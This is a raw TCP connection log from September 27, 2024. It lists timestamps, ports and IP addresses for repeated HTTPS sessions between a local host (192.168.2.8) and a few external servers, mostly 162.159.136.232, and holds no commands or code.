Sep 27, 2024 18:18:46.986267090 CEST	443	49707	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:46.986356020 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:46.987471104 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:46.987608910 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:46.988940954 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:46.988984108 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:46.989052057 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:46.989379883 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:46.989391088 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.186656952 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.187155962 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.187201977 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.188282013 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.188337088 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.189923048 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.190002918 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.190045118 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.190089941 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.190099955 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.267901897 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.363884926 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.364018917 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.364104986 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.364804983 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.366031885 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.366065025 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.366543055 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.366872072 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.366887093 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.464684963 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.465158939 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:47.465184927 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.466218948 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.466311932 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:47.467757940 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:47.467819929 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.467951059 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:47.467957020 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.601089001 CEST	443	49711	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:47.601166010 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:47.601697922 CEST	49711	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:47.602703094 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:47.602741957 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:47.602808952 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:47.603208065 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:47.603219032 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:47.837935925 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.838488102 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.838505030 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.839550018 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.839622021 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.840826988 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.840883970 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.840989113 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.840996027 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.841022968 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:47.883411884 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:47.892271996 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.028687000 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.028811932 CEST	443	49712	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.028876066 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.031019926 CEST	49712	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.031969070 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.032013893 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.032089949 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.032567978 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.032584906 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.477252007 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.477884054 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.477905035 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.479001999 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.479059935 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.480252028 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.480339050 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.480417013 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.480426073 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.508332014 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.508879900 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.508912086 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.509970903 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.510031939 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.511208057 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.511281013 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.511373043 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.511380911 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.511411905 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.532874107 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.559411049 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.564142942 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.682125092 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.682245970 CEST	443	49714	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.682311058 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.682956934 CEST	49714	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.683747053 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.683876038 CEST	443	49713	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:48.683921099 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.684192896 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.684195995 CEST	49713	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:48.684231043 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.684297085 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.684787035 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.684803009 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.684978962 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.685002089 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:48.685060978 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.685339928 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:48.685353041 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.158627033 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.159147024 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.159157991 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.160226107 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.160288095 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.162055016 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.162132025 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.162198067 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.162204027 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.162231922 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.177403927 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.179006100 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.179028034 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.180229902 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.182466030 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.186626911 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.186626911 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.186755896 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.186822891 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.203402042 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.204802990 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.231403112 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.236023903 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.236037016 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.282916069 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.344095945 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.344208002 CEST	443	49715	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.344245911 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.345150948 CEST	49715	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.346246004 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.346283913 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.346339941 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.346771002 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.346781969 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.389635086 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.389756918 CEST	443	49716	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.389801979 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.390615940 CEST	49716	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.392837048 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.392869949 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.392927885 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.393578053 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.393601894 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.829858065 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.830980062 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.831027985 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.832118988 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.832206964 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.833506107 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.833589077 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.833623886 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.833693981 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.833710909 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.868796110 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.870920897 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.870933056 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.872037888 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.872137070 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.873568058 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.873627901 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.873703003 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.874039888 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.874046087 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:49.876607895 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:49.923486948 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.017580986 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.017968893 CEST	443	49718	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.018033028 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.018521070 CEST	49718	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.019342899 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.019372940 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.019468069 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.019823074 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.019833088 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.076821089 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.076937914 CEST	443	49719	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.077033043 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.077666044 CEST	49719	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.078594923 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.078618050 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.078721046 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.079236031 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.079245090 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.502310991 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.504187107 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.504203081 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.505249023 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.505314112 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.516983986 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.517057896 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.517123938 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.517131090 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.517165899 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.555360079 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.559395075 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.564088106 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.595356941 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.607382059 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.607394934 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.608549118 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.608608961 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.676083088 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.676173925 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.676206112 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.676213980 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.676229000 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.720324993 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.720333099 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.758641958 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.758761883 CEST	443	49721	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.758812904 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.759802103 CEST	49721	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.761889935 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.762001038 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.762084007 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.766006947 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.766062021 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.770098925 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.862481117 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.862601995 CEST	443	49722	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.862643957 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.863411903 CEST	49722	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.864447117 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.864475012 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:50.864537954 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.865047932 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:50.865057945 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.226284981 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.226876974 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.226907969 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.227988958 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.228055954 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.229621887 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.229688883 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.229775906 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.229777098 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.229790926 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.271406889 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.282852888 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.343578100 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.344026089 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.344036102 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.345079899 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.345132113 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.346776962 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.346836090 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.346909046 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.346913099 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.346951008 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.387396097 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.437249899 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.437357903 CEST	443	49724	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.437405109 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.437989950 CEST	49724	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.536747932 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.536889076 CEST	443	49725	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.536942005 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.537687063 CEST	49725	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.538804054 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.538866997 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:51.538938046 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.539489985 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:51.539506912 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.012358904 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.012898922 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.012934923 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.014013052 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.014100075 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.015336037 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.015420914 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.015753984 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.015764952 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.015846968 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.059403896 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.227454901 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.227571964 CEST	443	49727	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.227777004 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.228193045 CEST	49727	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.230011940 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.230052948 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.230145931 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.230518103 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.230530977 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.701966047 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.702960014 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.702982903 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.704082966 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.704221964 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.706705093 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.706790924 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.706939936 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.706950903 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.707417965 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.755399942 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.906666040 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.906788111 CEST	443	49728	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.906847000 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.908421040 CEST	49728	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.909768105 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.909802914 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:52.909866095 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.910418034 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:52.910430908 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.371552944 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.409559965 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.409590006 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.412159920 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.412214041 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.417049885 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.417156935 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.417462111 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.417469025 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.417493105 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.459412098 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.470339060 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.570144892 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.571197987 CEST	443	49729	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.571253061 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.571913958 CEST	49729	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.573312044 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.573347092 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:53.573424101 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.573810101 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:53.573822975 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.038938999 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.039442062 CEST	49730	443	192.168.2.8	162.159.136.232
